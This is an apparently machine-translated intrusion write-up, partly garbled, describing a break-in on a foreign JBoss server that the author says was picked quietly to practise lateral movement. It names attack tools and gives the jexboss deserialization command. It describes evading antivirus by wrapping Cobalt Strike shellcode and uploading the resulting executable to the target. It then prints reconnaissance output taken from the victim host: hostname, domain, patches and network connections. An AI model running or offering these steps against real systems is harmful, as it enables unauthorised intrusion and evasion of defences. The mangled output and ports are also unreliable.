.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
ツールの準備
jexboss
Kali Linux
CS 4.3
Windows Killer Onlineクエリ1
Windows Killer Onlineクエリ2
Windows Killer Onlineクエリ3
fscan
タイドシェルコード無料キル
lstar
Cobaltstrike用のその他のプラグイン
PEASS-NG
printspoofer
屋外インターネットサービス
1。イントラネットの水平方向を練習するために、外国のサイトに静かに焦点を当てる
2。JBossのWebサイトには、Deserializationの脆弱性があることがわかりました。はい、jexbossを正常に使用することはできません。
python jexboss.py -u https://xx.xx.xx/3。 6人の兄弟による脱派化のための究極のテストツールに成功しました
4.現在のユーザーWhoami、普通のユーザーを確認してください
5。IPアドレスIPConfigを確認します
6.キラータスクリスト /SVCがあるかどうかを確認します
7.クエリコンテンツをWindowsに貼り付けてソフトオンラインクエリを殺し、ソフトを殺していることを見つけます
8.サーバーがネットワークから外れているかどうかを確認してくださいwww.baidu.com、それは非常に良いです。サーバーはネットワーク外です
csはオンライン
です1。ソフトキーリングソフトウェアがあるため、バイパスすることを検討する必要があります。 CSトロイの木馬を直接アップロードすることは絶対に不可能です。今回は、GitHub上のPythonを使用してパッケージ化された多くのExeファイルが大きすぎて非常にゆっくりとアップロードされているため、Tideシェルコードは殺されません。
2。CSはC言語のシェルコードになります
3.シェルコードコンテンツをTIDAL Webサイトにコピーし、生成されたexeをターゲットマシンにアップロードし、コマンドを実行します
c: \\ usr \\ desarrollo \\ jboss-5.1.0.ga \\ server \\ sigameserver \\ deploy \\ root.war \\ tideav-go1-2023-02-04-10-31-21-221261.exe tide
4。CSが正常に起動されます
許可強化
情報収集
1。現在のユーザーと特権を表示します
おっと
おっと /priv
2。システムバージョンとパッチ情報を表示します
SystemInfo
nombre de host: ameprowebegad
Nombre del Sistema OperatingVO: Microsoft Windows 10 Pro
Versi¢n Del Sistema Operativo: 10.0.19044 N/D Compilaci¢n 19044
Fabricante del Sistema OperatingVO: Microsoft Corporation
configuraci¢n del sistema operativo: estaci¢n de trabajo miembro
Tipo de compilaci¢n del sistema operativo:マルチプロセッサ無料
Propiedad de: appzusr
organaCi¢n Registadada:
id。 Del Producto: 00331-10000-00001-AA727
fecha de instalaci¢n original3: 13/5/2022、14336003:47
Tiempo de Arranque del Sistema: 1/2/2023、16336050336029
Fabricante del Sistema: VMware、Inc。
Modelo El Sistema: VMware仮想プラットフォーム
Tipo de sistema: x64ベースのPC
Procesador(ES): 2 Procesadores Instalados。
[01] : Intel64ファミリー6モデル85ステッピング7純粋なインテル〜2494 MHz
[02] : Intel64ファミリー6モデル85ステッピング7純粋なインテル〜2494 MHz
Versi¢n del Bios: Phoenix Technologies Ltd 6.00、12/11/2020
Directorio de Windows: C: \ Windows
Directorio de Sistema: C: \ Windows \ System32
dispuritivo de arranque: \ device \ harddiskvolume1
Configuraci¢n Regional Del Sistema: EZS-MX;ESPA¤ol(Mlyxico)
Idioma de entrada: es-mx;espa¤ol(menxico)
Zona Horaria:(UTC-06:00)Guadalajara、Ciudad de M、Menxico、Monterrey
Cantidad Total De Memoriaf¡sica:4.095 Mb
Mememeiaf¡sicadisonible: 1.201 Mb
MEMERIA VIRTUAL:TAMA配M XIMO: 4.799 MB
MEMERIA VIRTUAL: DISPONIBLE: 1.147 MB
MEMERIA VIRTUAL: EN USO: 3.652 MB
ubicaci¢n(es)de archivo de paginaci¢n: c: \ pagefile.sys
dominio: ame.local
Servidor de inicio de sesi¢n: \\ ameprowebegad
revisi¢n(es): 4 revisi¢n(es)instaladas。
[01] : KB5004331
[02] : KB5003791
[03] : KB5006670
[04] : KB5005699
Tarjeta(s)de Red: 1 Tarjetas de Interfaz de Red Instaladas。
Z [01] : Intel(R)Pro/1000 MTネットワーク接続
nombre de conexi¢n: ethernet0
DHCP Habilitado: no
Direcciones IP
[01] : 172.16.2.100
[02] : FE80:591:AE09:EEE1:888E
Hyper-V: se extect¢un hippervisorが必要です。 No se mostr n lascaracter¡sticas必要なパラhyper -v.3、オープンポートサービスnetstat -anoを表示
Conexiones activas
Proto direcci¢n local direcci¢n Remota estado pid
TCP 0.0.0.03360135 0.0.0.0:0リスニング600
TCP 0.0.0.03360445 0.0.0.0:0リスニング4
TCP 0.0.0.033601090 0.0.0.0:0リスニング7600
TCP 0.0.0.033601098 0.0.0.0:0リスニング7600
TCP Z 0.0.0.033601099 0.0.0.0:0リスニング7600
TCP 0.0.0.033603389 0.0.0.0:0リスニング1072
TCP 0.0.0.033603873 0.0.0.0:0リスニング7600
TCP 0.0.0.033604444 0.0.0.0:0リスニング7600
TCP 0.0.0.03360445 0.0.0.0:0リスニング7600
TCP 0.0.0.033604446 0.0.0.0:0リスニング7600
TCP 0.0.0.03360457 0.0.0.0:0リスニング7600
TCP 0.0.0.033604712 0.0.0.0:0リスニング7600
TCP 0.0.0.033604713 0.0.0.0:0リスニング7600
TCP 0.0.0.033605040 0.0.0.0:0リスニング6652
TCP 0.0.0.0:5985 0.0.0.0:0リスニング4
TCP 0.0.0.033607070 0.0.0.0:0リスニング3564
TCP 0.0.0.0:8009 0.0.0.0:0リスニング7600
TCP 0.0.0.033608080 0.0.0.0:0 Zリスニング7600
TCP 0.0.0.033608083 0.0.0.0:0リスニング7600
TCP 0.0.0.0336046305 0.0.0.0:0リスニング7600
TCP 0.0.0.0336047001 0.0.0.0:0リスニング4
TCP 0.0.0.0336049664 0.0.0.0:0リスニング832
TCP 0.0.0.0336049665 0.0.0.0:0リスニング680
TCP 0.0.0.0336049666 0.0.0.0:0リスニング1416
TCP 0.0.0.0336049667 0.0.0.0:0リスニング1612
TCP 0.0.0.0336049668 0.0.0.0:0リスニング2452
TCP 0.0.0.0336049671 0.0.0.0:0リスニング832
TCP 0.0.0.0336049672 0.0.0.0:0リスニング3404
TCP 0.0.0.0336049704 0.0.0.0:0リスニング820
TCP 0.0.0.0336049708 0.0.0.0:0リスニング3048
TCP 0.0.0.0336051407 0.0.0.0:0リスニング7600
TCP 127Z.0.0.0.1:5140 0.0.0.0:0リスニング7172
TCP 127.0.0.1:51411 0.0.0.0:0リスニング7600
TCP 172.16.2.2.100:139 0.0.0.0:0リスニング4
TCP 172.16.2.2.100:8080 172.16.12.34:42602 Time_Wait 0
TCP 172.16.2.2.100:8080 172.16.12.34:42610確立された7600
TCP 172.16.2.100:8080 172.16.12.34336055672 Time_Wait 0
TCP 172.16.2.2.100:8080 172.16.12.34:55686 Time_Wait 0
TCP 172.16.2.2.100:49717 38.90.226.62:8883確立3576
TCP 172.16.2.2.100:50848 172.16.2.2.100:51407 TIME_WAIT 0
TCP 172.16.2.2.100:51413 172.16.2.2.19033601433確立された7600
TCP 172.16.2.2.100:51447 172.16.2.2.19033601433確立された7600
TCP 172.16.2.2.100:56063 172.16.2.11:2222確立3576
TCP 172.16.2.2.100:56538 92.223.66.483360443確立された3564
TCP [:] :135 [:] :0リスニングインズ600
TCP [:] :445 [:] :0リスニング4
TCP [:] :1090 [:] :0リスニング7600
TCP [:] :1098 [:] :0リスニング7600
TCP [:] :1099 [:] :0リスニング7600
TCP [:3360] :3389 [:] :0リスニング1072
TCP [:3360] :3873 [:] :0リスニング7600
TCP [:] :4444 [:] :0リスニング7600
TCP [:] :4445 [:] :0リスニング7600
TCP [:] :4446 [:] :0リスニング7600
TCP [:] :4457 [:] :0リスニング7600
TCP [:] :4712 [:] :0リスニング7600
TCP [:] :4713 [:] :0リスニング7600
TCP [:3360] :5985